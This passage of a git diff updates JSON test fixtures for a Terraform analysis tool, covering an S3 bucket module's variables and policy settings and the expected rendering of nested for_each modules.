+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this",
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyOutdatedTLS"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_require_latest_tls_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_partition.current",
+                                "mode": "data",
+                                "type": "aws_partition",
+                                "name": "current",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "schema_version": 0
+                            },
+                            {
+                                "address": "data.aws_region.current",
+                                "mode": "data",
+                                "type": "aws_region",
+                                "name": "current",
+                                "provider_config_key": "s3-bucket-2:aws",
+                                "schema_version": 0
+                            }
+                        ],
+                        "variables": {
+                            "acceleration_status": {
+                                "default": null,
+                                "description": "(Optional) Sets the accelerate configuration of an existing bucket. Can be Enabled or Suspended."
+                            },
+                            "access_log_delivery_policy_source_accounts": {
+                                "default": [],
+                                "description": "(Optional) List of AWS Account IDs should be allowed to deliver access logs to this bucket."
+                            },
+                            "access_log_delivery_policy_source_buckets": {
+                                "default": [],
+                                "description": "(Optional) List of S3 bucket ARNs wich should be allowed to deliver access logs to this bucket."
+                            },
+                            "acl": {
+                                "default": null,
+                                "description": "(Optional) The canned ACL to apply. Conflicts with `grant`"
+                            },
+                            "allowed_kms_key_arn": {
+                                "default": null,
+                                "description": "The ARN of KMS key which should be allowed in PutObject"
+                            },
+                            "analytics_configuration": {
+                                "default": {},
+                                "description": "Map containing bucket analytics configuration."
+                            },
+                            "analytics_self_source_destination": {
+                                "default": false,
+                                "description": "Whether or not the analytics source bucket is also the destination bucket."
+                            },
+                            "analytics_source_account_id": {
+                                "default": null,
+                                "description": "The analytics source account id."
+                            },
+                            "analytics_source_bucket_arn": {
+                                "default": null,
+                                "description": "The analytics source bucket ARN."
+                            },
+                            "attach_access_log_delivery_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have S3 access log delivery policy attached"
+                            },
+                            "attach_analytics_destination_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have bucket analytics destination policy attached."
+                            },
+                            "attach_deny_incorrect_encryption_headers": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should deny incorrect encryption headers policy attached."
+                            },
+                            "attach_deny_incorrect_kms_key_sse": {
+                                "default": false,
+                                "description": "Controls if S3 bucket policy should deny usage of incorrect KMS key SSE."
+                            },
+                            "attach_deny_insecure_transport_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have deny non-SSL transport policy attached"
+                            },
+                            "attach_deny_unencrypted_object_uploads": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should deny unencrypted object uploads policy attached."
+                            },
+                            "attach_elb_log_delivery_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have ELB log delivery policy attached"
+                            },
+                            "attach_inventory_destination_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have bucket inventory destination policy attached."
+                            },
+                            "attach_lb_log_delivery_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have ALB/NLB log delivery policy attached"
+                            },
+                            "attach_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have bucket policy attached (set to `true` to use value of `policy` as bucket policy)"
+                            },
+                            "attach_public_policy": {
+                                "default": true,
+                                "description": "Controls if a user defined public bucket policy will be attached (set to `false` to allow upstream to apply defaults to the bucket)"
+                            },
+                            "attach_require_latest_tls_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should require the latest version of TLS"
+                            },
+                            "block_public_acls": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should block public ACLs for this bucket."
+                            },
+                            "block_public_policy": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should block public bucket policies for this bucket."
+                            },
+                            "bucket": {
+                                "default": null,
+                                "description": "(Optional, Forces new resource) The name of the bucket. If omitted, Terraform will assign a random, unique name."
+                            },
+                            "bucket_prefix": {
+                                "default": null,
+                                "description": "(Optional, Forces new resource) Creates a unique bucket name beginning with the specified prefix. Conflicts with bucket."
+                            },
+                            "control_object_ownership": {
+                                "default": false,
+                                "description": "Whether to manage S3 Bucket Ownership Controls on this bucket."
+                            },
+                            "cors_rule": {
+                                "default": [],
+                                "description": "List of maps containing rules for Cross-Origin Resource Sharing."
+                            },
+                            "create_bucket": {
+                                "default": true,
+                                "description": "Controls if S3 bucket should be created"
+                            },
+                            "expected_bucket_owner": {
+                                "default": null,
+                                "description": "The account ID of the expected bucket owner"
+                            },
+                            "force_destroy": {
+                                "default": false,
+                                "description": "(Optional, Default:false ) A boolean that indicates all objects should be deleted from the bucket so that the bucket can be destroyed without error. These objects are not recoverable."
+                            },
+                            "grant": {
+                                "default": [],
+                                "description": "An ACL policy grant. Conflicts with `acl`"
+                            },
+                            "ignore_public_acls": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should ignore public ACLs for this bucket."
+                            },
+                            "intelligent_tiering": {
+                                "default": {},
+                                "description": "Map containing intelligent tiering configuration."
+                            },
+                            "inventory_configuration": {
+                                "default": {},
+                                "description": "Map containing S3 inventory configuration."
+                            },
+                            "inventory_self_source_destination": {
+                                "default": false,
+                                "description": "Whether or not the inventory source bucket is also the destination bucket."
+                            },
+                            "inventory_source_account_id": {
+                                "default": null,
+                                "description": "The inventory source account id."
+                            },
+                            "inventory_source_bucket_arn": {
+                                "default": null,
+                                "description": "The inventory source bucket ARN."
+                            },
+                            "lifecycle_rule": {
+                                "default": [],
+                                "description": "List of maps containing configuration of object lifecycle management."
+                            },
+                            "logging": {
+                                "default": {},
+                                "description": "Map containing access bucket logging configuration."
+                            },
+                            "metric_configuration": {
+                                "default": [],
+                                "description": "Map containing bucket metric configuration."
+                            },
+                            "object_lock_configuration": {
+                                "default": {},
+                                "description": "Map containing S3 object locking configuration."
+                            },
+                            "object_lock_enabled": {
+                                "default": false,
+                                "description": "Whether S3 bucket should have an Object Lock configuration enabled."
+                            },
+                            "object_ownership": {
+                                "default": "BucketOwnerEnforced",
+                                "description": "Object ownership. Valid values: BucketOwnerEnforced, BucketOwnerPreferred or ObjectWriter. 'BucketOwnerEnforced': ACLs are disabled, and the bucket owner automatically owns and has full control over every object in the bucket. 'BucketOwnerPreferred': Objects uploaded to the bucket change ownership to the bucket owner if the objects are uploaded with the bucket-owner-full-control canned ACL. 'ObjectWriter': The uploading account will own the object if the object is uploaded with the bucket-owner-full-control canned ACL."
+                            },
+                            "owner": {
+                                "default": {},
+                                "description": "Bucket owner's display name and ID. Conflicts with `acl`"
+                            },
+                            "policy": {
+                                "default": null,
+                                "description": "(Optional) A valid bucket policy JSON document. Note that if the policy document is not specific enough (but still valid), Terraform may view the policy as constantly changing in a terraform plan. In this case, please make sure you use the verbose/specific version of the policy. For more information about building AWS IAM policy documents with Terraform, see the AWS IAM Policy Document Guide."
+                            },
+                            "replication_configuration": {
+                                "default": {},
+                                "description": "Map containing cross-region replication configuration."
+                            },
+                            "request_payer": {
+                                "default": null,
+                                "description": "(Optional) Specifies who should bear the cost of Amazon S3 data transfer. Can be either BucketOwner or Requester. By default, the owner of the S3 bucket would incur the costs of any data transfer. See Requester Pays Buckets developer guide for more information."
+                            },
+                            "restrict_public_buckets": {
+                                "default": true,
+                                "description": "Whether Amazon S3 should restrict public bucket policies for this bucket."
+                            },
+                            "server_side_encryption_configuration": {
+                                "default": {},
+                                "description": "Map containing server-side encryption configuration."
+                            },
+                            "tags": {
+                                "default": {},
+                                "description": "(Optional) A mapping of tags to assign to the bucket."
+                            },
+                            "versioning": {
+                                "default": {},
+                                "description": "Map containing versioning configuration."
+                            },
+                            "website": {
+                                "default": {},
+                                "description": "Map containing static web-site hosting or redirect configuration."
+                            }
+                        }
+                    },
+                    "version_constraint": "4.0.1"
+                }
+            }
+        }
+    }
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json b/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json
index e8735ca7d20..6aef536a90b 100644
--- a/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json
+++ b/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json
@@ -3,6 +3,7 @@
     "module": [
       {
         "s3_module[\"a\"]": {
+          "__address__": "s3_module[\"a\"]",
           "__end_line__": 12,
           "__resolved__": [
             "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}"
@@ -16,12 +17,12 @@
           ],
           "source": [
             "./module"
-          ],
-          "__address__": "s3_module[\"a\"]"
+          ]
         }
       },
       {
         "s3_module2[0]": {
+          "__address__": "s3_module2[0]",
           "__end_line__": 19,
           "__resolved__": [
             "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}"
@@ -35,12 +36,12 @@
           ],
           "source": [
             "./module"
-          ],
-          "__address__": "s3_module2[0]"
+          ]
         }
       },
       {
         "s3_module[\"b\"]": {
+          "__address__": "s3_module[\"b\"]",
           "__end_line__": 12,
           "__resolved__": [
             "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}"
@@ -54,12 +55,12 @@
           ],
           "source": [
             "./module"
-          ],
-          "__address__": "s3_module[\"b\"]"
+          ]
         }
       },
       {
         "s3_module2[1]": {
+          "__address__": "s3_module2[1]",
           "__end_line__": 19,
           "__resolved__": [
             "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}"
@@ -73,14 +74,14 @@
           ],
           "source": [
             "./module"
-          ],
-          "__address__": "s3_module2[1]"
+          ]
         }
       }
     ],
     "provider": [
       {
         "aws": {
+          "__address__": "aws.test_provider",
           "__end_line__": 5,
           "__start_line__": 1,
           "alias": [
@@ -91,8 +92,7 @@
           ],
           "test_provider": [
             true
-          ],
-          "__address__": "aws.test_provider"
+          ]
         }
       }
     ]
@@ -101,88 +101,178 @@
     "module": [
       {
         "inner_s3_module[\"c\"]": {
+          "__address__": "module.s3_module[\"a\"].inner_s3_module[\"c\"]",
           "__end_line__": 5,
           "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
+          ],
+          "__start_line__": 1,
+          "bucket2": [
+            false
+          ],
+          "source": [
+            "./module2"
+          ]
+        }
+      },
+      {
+        "inner_s3_module2[\"e\"]": {
+          "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"e\"]",
+          "__end_line__": 11,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
+          ],
+          "__start_line__": 7,
+          "bucket2": [
+            ""
+          ],
+          "source": [
+            "./module2"
+          ]
+        }
+      },
+      {
+        "inner_s3_module[\"d\"]": {
+          "__address__": "module.s3_module[\"a\"].inner_s3_module[\"d\"]",
+          "__end_line__": 5,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
           ],
           "__start_line__": 1,
           "bucket2": [
-            "var.bucket"
+            false
           ],
           "source": [
             "./module2"
+          ]
+        }
+      },
+      {
+        "inner_s3_module2[\"f\"]": {
+          "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"f\"]",
+          "__end_line__": 11,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
           ],
-          "__address__": "module.s3_module[\"a\"].inner_s3_module[\"c\"]"
+          "__start_line__": 7,
+          "bucket2": [
+            ""
+          ],
+          "source": [
+            "./module2"
+          ]
+        }
+      }
+    ],
+    "variable": [
+      {
+        "bucket": {
+          "__address__": "module.s3_module[\"a\"].bucket",
+          "__end_line__": 16,
+          "__start_line__": 14,
+          "type": [
+            "string"
+          ]
+        }
+      },
+      {
+        "bucket2": {
+          "__address__": "module.s3_module[\"a\"].bucket2",
+          "__end_line__": 20,
+          "__start_line__": 18,
+          "type": [
+            "string"
+          ]
+        }
+      }
+    ]
+  },
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": {
+    "module": [
+      {
+        "inner_s3_module[\"c\"]": {
+          "__address__": "module.s3_module[\"b\"].inner_s3_module[\"c\"]",
+          "__end_line__": 5,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
+          ],
+          "__start_line__": 1,
+          "bucket2": [
+            false
+          ],
+          "source": [
+            "./module2"
+          ]
         }
       },
       {
         "inner_s3_module2[\"e\"]": {
+          "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"e\"]",
           "__end_line__": 11,
           "__resolved__": [
             "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
           ],
           "__start_line__": 7,
           "bucket2": [
-            "var.bucket2"
+            ""
           ],
           "source": [
             "./module2"
-          ],
-          "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"e\"]"
+          ]
         }
       },
       {
         "inner_s3_module[\"d\"]": {
+          "__address__": "module.s3_module[\"b\"].inner_s3_module[\"d\"]",
           "__end_line__": 5,
           "__resolved__": [
             "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
           ],
           "__start_line__": 1,
           "bucket2": [
-            "var.bucket"
+            false
           ],
           "source": [
             "./module2"
-          ],
-          "__address__": "module.s3_module[\"a\"].inner_s3_module[\"d\"]"
+          ]
         }
       },
       {
         "inner_s3_module2[\"f\"]": {
+          "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"f\"]",
           "__end_line__": 11,
           "__resolved__": [
             "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}"
           ],
           "__start_line__": 7,
           "bucket2": [
-            "var.bucket2"
+            ""
           ],
           "source": [
             "./module2"
-          ],
-          "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"f\"]"
+          ]
         }
       }
     ],
     "variable": [
       {
         "bucket": {
+          "__address__": "module.s3_module[\"b\"].bucket",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module[\"a\"].bucket"
+          ]
         }
       },
       {
         "bucket2": {
+          "__address__": "module.s3_module[\"b\"].bucket2",
           "__end_line__": 20,
           "__start_line__": 18,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module[\"a\"].bucket2"
+          ]
         }
       }
     ]
@@ -191,88 +281,178 @@
     "module": [
       {
         "inner_s3_module[\"c\"]": {
+          "__address__": "module.s3_module2[0].inner_s3_module[\"c\"]",
           "__end_line__": 5,
           "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
+          ],
+          "__start_line__": 1,
+          "bucket2": [
+            ""
+          ],
+          "source": [
+            "./module2"
+          ]
+        }
+      },
+      {
+        "inner_s3_module2[\"e\"]": {
+          "__address__": "module.s3_module2[0].inner_s3_module2[\"e\"]",
+          "__end_line__": 11,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
+          ],
+          "__start_line__": 7,
+          "bucket2": [
+            true
+          ],
+          "source": [
+            "./module2"
+          ]
+        }
+      },
+      {
+        "inner_s3_module[\"d\"]": {
+          "__address__": "module.s3_module2[0].inner_s3_module[\"d\"]",
+          "__end_line__": 5,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
           ],
           "__start_line__": 1,
           "bucket2": [
-            "var.bucket"
+            ""
+          ],
+          "source": [
+            "./module2"
+          ]
+        }
+      },
+      {
+        "inner_s3_module2[\"f\"]": {
+          "__address__": "module.s3_module2[0].inner_s3_module2[\"f\"]",
+          "__end_line__": 11,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
+          ],
+          "__start_line__": 7,
+          "bucket2": [
+            true
           ],
           "source": [
             "./module2"
+          ]
+        }
+      }
+    ],
+    "variable": [
+      {
+        "bucket": {
+          "__address__": "module.s3_module2[0].bucket",
+          "__end_line__": 16,
+          "__start_line__": 14,
+          "type": [
+            "string"
+          ]
+        }
+      },
+      {
+        "bucket2": {
+          "__address__": "module.s3_module2[0].bucket2",
+          "__end_line__": 20,
+          "__start_line__": 18,
+          "type": [
+            "string"
+          ]
+        }
+      }
+    ]
+  },
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": {
+    "module": [
+      {
+        "inner_s3_module[\"c\"]": {
+          "__address__": "module.s3_module2[1].inner_s3_module[\"c\"]",
+          "__end_line__": 5,
+          "__resolved__": [
+            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
           ],
-          "__address__": "module.s3_module2[0].inner_s3_module[\"c\"]"
+          "__start_line__": 1,
+          "bucket2": [
+            ""
+          ],
+          "source": [
+            "./module2"
+          ]
         }
       },
       {
         "inner_s3_module2[\"e\"]": {
+          "__address__": "module.s3_module2[1].inner_s3_module2[\"e\"]",
           "__end_line__": 11,
           "__resolved__": [
             "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
           ],
           "__start_line__": 7,
           "bucket2": [
-            "var.bucket2"
+            true
           ],
           "source": [
             "./module2"
-          ],
-          "__address__": "module.s3_module2[0].inner_s3_module2[\"e\"]"
+          ]
         }
       },
       {
         "inner_s3_module[\"d\"]": {
+          "__address__": "module.s3_module2[1].inner_s3_module[\"d\"]",
           "__end_line__": 5,
           "__resolved__": [
             "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
           ],
           "__start_line__": 1,
           "bucket2": [
-            "var.bucket"
+            ""
           ],
           "source": [
             "./module2"
-          ],
-          "__address__": "module.s3_module2[0].inner_s3_module[\"d\"]"
+          ]
         }
       },
       {
         "inner_s3_module2[\"f\"]": {
+          "__address__": "module.s3_module2[1].inner_s3_module2[\"f\"]",
           "__end_line__": 11,
           "__resolved__": [
             "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
           ],
           "__start_line__": 7,
           "bucket2": [
-            "var.bucket2"
+            true
           ],
           "source": [
             "./module2"
-          ],
-          "__address__": "module.s3_module2[0].inner_s3_module2[\"f\"]"
+          ]
         }
       }
     ],
     "variable": [
       {
         "bucket": {
+          "__address__": "module.s3_module2[1].bucket",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module2[0].bucket"
+          ]
         }
       },
       {
         "bucket2": {
+          "__address__": "module.s3_module2[1].bucket2",
           "__end_line__": 20,
           "__start_line__": 18,
           "type": [
             "string"
-          ],
-          "__address__": "module.s3_module2[0].bucket2"
+          ]
         }
       }
     ]
@@ -280,17 +460,19 @@
   "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
     "locals": [
       {
+        "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2",
         "bucket2": [
-          "var.bucket2"
-        ],
-        "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2"
+          false
+        ]
       }
     ],
     "resource": [
       {
         "aws_s3_bucket_public_access_block": {
           "var_bucket": {
+            "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket",
             "__end_line__": 11,
+            "__provider_address__": "",
             "__start_line__": 5,
             "block_public_acls": [
               true
@@ -299,15 +481,14 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              false
             ],
             "ignore_public_acls": [
               true
             ],
             "restrict_public_buckets": [
               true
-            ],
-            "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket"
+            ]
           }
         }
       }
@@ -315,30 +496,32 @@
     "variable": [
       {
         "bucket2": {
+          "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2",
           "__end_line__": 16,
           "__start_line__": 14,
           "type": [
             "string"
-          ],
